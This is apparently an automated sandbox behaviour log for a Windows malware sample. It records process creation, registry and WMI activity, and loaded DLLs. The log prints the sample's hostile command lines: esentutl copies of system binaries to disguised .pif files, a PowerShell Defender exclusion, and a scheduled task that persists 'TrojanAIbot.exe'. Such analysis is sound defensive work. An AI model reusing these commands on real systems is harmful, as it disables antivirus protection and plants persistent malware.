Source: C:\Users\Public\Libraries\Wisrysxl.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 2jbMIxCFsK.exe ReversingLabs: Detection: 57%
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe File read: C:\Users\user\Desktop\2jbMIxCFsK.exe Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Users\user\Desktop\2jbMIxCFsK.exe "C:\Users\user\Desktop\2jbMIxCFsK.exe"
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\2jbMIxCFsK.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 02:18 /du 23:59 /sc daily /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpBC1D.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Windows\SysWOW64\timeout.exe Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Windows\SysWOW64\timeout.exe Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: unknown Process created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" " Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\2jbMIxCFsK.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe" Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 02:18 /du 23:59 /sc daily /ri 1 /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpBC1D.tmp.cmd"" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: url.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: spp.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: vssapi.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: vsstrace.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ieproxy.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ieproxy.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ieproxy.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: mssip32.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: mssip32.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: mssip32.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: smartscreenps.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: smartscreenps.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: smartscreenps.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: winhttpcom.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ??????????.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ??????????.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ??????????.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ???.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ???.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ???.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: am.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ?.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ?.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ???e???????????.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ???e???????????.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ?.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ?.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ?.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ?.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: tquery.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: cryptdll.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: mssip32.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: endpointdlp.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: advapi.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: sppwmi.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: sppcext.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: winscard.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: esent.dll Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: esent.dll Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: esent.dll Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: mpr.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: secur32.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: iphlpapi.dll Jump to behavior
